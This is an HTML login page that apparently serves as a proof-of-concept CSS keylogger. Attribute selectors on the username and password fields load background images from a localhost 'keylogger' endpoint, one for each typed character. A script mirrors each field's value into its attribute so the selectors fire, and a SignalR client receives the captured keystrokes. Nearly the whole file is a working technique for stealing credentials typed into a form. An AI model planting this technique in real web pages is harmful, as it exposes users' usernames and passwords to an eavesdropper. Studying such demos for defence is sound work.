<!DOCTYPE html>
<html>
<head>
    <title>Login</title>

    <!-- hacking in progress -->
    <style>
        input[type="text"][value$="a"] {
            background-image: url("http://localhost:53546/api/keylogger/user/a");
        }
        input[type="text"][value$="b"] {
            background-image: url("http://localhost:53546/api/keylogger/user/b");
        }
        input[type="text"][value$="c"] {
            background-image: url("http://localhost:53546/api/keylogger/user/c");
        }
        input[type="text"][value$="d"] {
            background-image: url("http://localhost:53546/api/keylogger/user/d");
        }
        input[type="text"][value$="e"] {
            background-image: url("http://localhost:53546/api/keylogger/user/e");
        }
        input[type="text"][value$="f"] {
            background-image: url("http://localhost:53546/api/keylogger/user/f");
        }
        input[type="text"][value$="g"] {
            background-image: url("http://localhost:53546/api/keylogger/user/g");
        }
        input[type="text"][value$="h"] {
            background-image: url("http://localhost:53546/api/keylogger/user/h");
        }
        input[type="text"][value$="i"] {
            background-image: url("http://localhost:53546/api/keylogger/user/i");
        }
        input[type="text"][value$="j"] {
            background-image: url("http://localhost:53546/api/keylogger/user/j");
        }
        input[type="text"][value$="k"] {
            background-image: url("http://localhost:53546/api/keylogger/user/k");
        }
        input[type="text"][value$="l"] {
            background-image: url("http://localhost:53546/api/keylogger/user/l");
        }
        input[type="text"][value$="m"] {
            background-image: url("http://localhost:53546/api/keylogger/user/m");
        }
        input[type="text"][value$="n"] {
            background-image: url("http://localhost:53546/api/keylogger/user/n");
        }
        input[type="text"][value$="o"] {
            background-image: url("http://localhost:53546/api/keylogger/user/o");
        }
        input[type="text"][value$="p"] {
            background-image: url("http://localhost:53546/api/keylogger/user/p");
        }
        input[type="text"][value$="q"] {
            background-image: url("http://localhost:53546/api/keylogger/user/q");
        }
        input[type="text"][value$="r"] {
            background-image: url("http://localhost:53546/api/keylogger/user/r");
        }
        input[type="text"][value$="s"] {
            background-image: url("http://localhost:53546/api/keylogger/user/s");
        }
        input[type="text"][value$="t"] {
            background-image: url("http://localhost:53546/api/keylogger/user/t");
        }
        input[type="text"][value$="u"] {
            background-image: url("http://localhost:53546/api/keylogger/user/u");
        }
        input[type="text"][value$="v"] {
            background-image: url("http://localhost:53546/api/keylogger/user/v");
        }
        input[type="text"][value$="w"] {
            background-image: url("http://localhost:53546/api/keylogger/user/w");
        }
        input[type="text"][value$="õ"] {
            background-image: url("http://localhost:53546/api/keylogger/user/õ");
        }
        input[type="text"][value$="ä"] {
            background-image: url("http://localhost:53546/api/keylogger/user/ä");
        }
        input[type="text"][value$="ö"] {
            background-image: url("http://localhost:53546/api/keylogger/user/ö");
        }
        input[type="text"][value$="ü"] {
            background-image: url("http://localhost:53546/api/keylogger/user/ü");
        }
        input[type="text"][value$="x"] {
            background-image: url("http://localhost:53546/api/keylogger/user/x");
        }
        input[type="text"][value$="y"] {
            background-image: url("http://localhost:53546/api/keylogger/user/y");
        }

        input[type="password"][value$="a"] {
            background-image: url("http://localhost:53546/api/keylogger/password/a");
        }
        input[type="password"][value$="b"] {
            background-image: url("http://localhost:53546/api/keylogger/password/b");
        }
        input[type="password"][value$="c"] {
            background-image: url("http://localhost:53546/api/keylogger/password/c");
        }
        input[type="password"][value$="d"] {
            background-image: url("http://localhost:53546/api/keylogger/password/d");
        }
        input[type="password"][value$="e"] {
            background-image: url("http://localhost:53546/api/keylogger/password/e");
        }
        input[type="password"][value$="f"] {
            background-image: url("http://localhost:53546/api/keylogger/password/f");
        }
        input[type="password"][value$="g"] {
            background-image: url("http://localhost:53546/api/keylogger/password/g");
        }
        input[type="password"][value$="h"] {
            background-image: url("http://localhost:53546/api/keylogger/password/h");
        }
        input[type="password"][value$="i"] {
            background-image: url("http://localhost:53546/api/keylogger/password/i");
        }
        input[type="password"][value$="j"] {
            background-image: url("http://localhost:53546/api/keylogger/password/j");
        }
        input[type="password"][value$="k"] {
            background-image: url("http://localhost:53546/api/keylogger/password/k");
        }
        input[type="password"][value$="l"] {
            background-image: url("http://localhost:53546/api/keylogger/password/l");
        }
        input[type="password"][value$="m"] {
            background-image: url("http://localhost:53546/api/keylogger/password/m");
        }
        input[type="password"][value$="n"] {
            background-image: url("http://localhost:53546/api/keylogger/password/n");
        }
        input[type="password"][value$="o"] {
            background-image: url("http://localhost:53546/api/keylogger/password/o");
        }
        input[type="password"][value$="p"] {
            background-image: url("http://localhost:53546/api/keylogger/password/p");
        }
        input[type="password"][value$="q"] {
            background-image: url("http://localhost:53546/api/keylogger/password/q");
        }
        input[type="password"][value$="r"] {
            background-image: url("http://localhost:53546/api/keylogger/password/r");
        }
        input[type="password"][value$="s"] {
            background-image: url("http://localhost:53546/api/keylogger/password/s");
        }
        input[type="password"][value$="t"] {
            background-image: url("http://localhost:53546/api/keylogger/password/t");
        }
        input[type="password"][value$="u"] {
            background-image: url("http://localhost:53546/api/keylogger/password/u");
        }
        input[type="password"][value$="v"] {
            background-image: url("http://localhost:53546/api/keylogger/password/v");
        }
        input[type="password"][value$="w"] {
            background-image: url("http://localhost:53546/api/keylogger/password/w");
        }
        input[type="password"][value$="õ"] {
            background-image: url("http://localhost:53546/api/keylogger/password/õ");
        }
        input[type="password"][value$="ä"] {
            background-image: url("http://localhost:53546/api/keylogger/password/ä");
        }
        input[type="password"][value$="ö"] {
            background-image: url("http://localhost:53546/api/keylogger/password/ö");
        }
        input[type="password"][value$="ü"] {
            background-image: url("http://localhost:53546/api/keylogger/password/ü");
        }
        input[type="password"][value$="x"] {
            background-image: url("http://localhost:53546/api/keylogger/password/x");
        }
        input[type="password"][value$="y"] {
            background-image: url("http://localhost:53546/api/keylogger/password/y");
        }

        input[type="submit"]:active {
            background-image: url("http://localhost:53546/api/keylogger/submit/-");
        }
    </style>
</head>
<body>

    <form>
        <table>
            <tr>
                <td>Username: </td>
                <td><input id="username" type="text" /></td>
            </tr>
            <tr>
                <td>Password: </td>
                <td><input id="password" type="password" /></td>
            </tr>
            <tr>
                <td colspan="2"><input id="submit" type="submit" value="submit" /></td>
            </tr>
        </table>
    </form>

    <script>
        // This is how a frontend framework might handle the DOM
        let inputs = [document.getElementById("username"), document.getElementById("password")];
        inputs.forEach(input => {
            input.addEventListener("input", function (e) {
                this.setAttribute("value", this.value);
            });
        });
    </script>
    
    <!-- demo for receiving input from server -->
    <script src="https://unpkg.com/jquery"></script>
    <script src="https://unpkg.com/@aspnet/signalr-client@1.0.0-alpha2-final/dist/browser/signalr-client-1.0.0-alpha2-final.js"></script>
    <script>
        const connection = new signalR.HubConnection('http://localhost:53546/hub/KeyloggerListenerHub');
        connection.start();
        connection.on('InputReceived', (type, input) => {
            console.log(`${type}: ${input}`);
        });
    </script>

</body>
</html>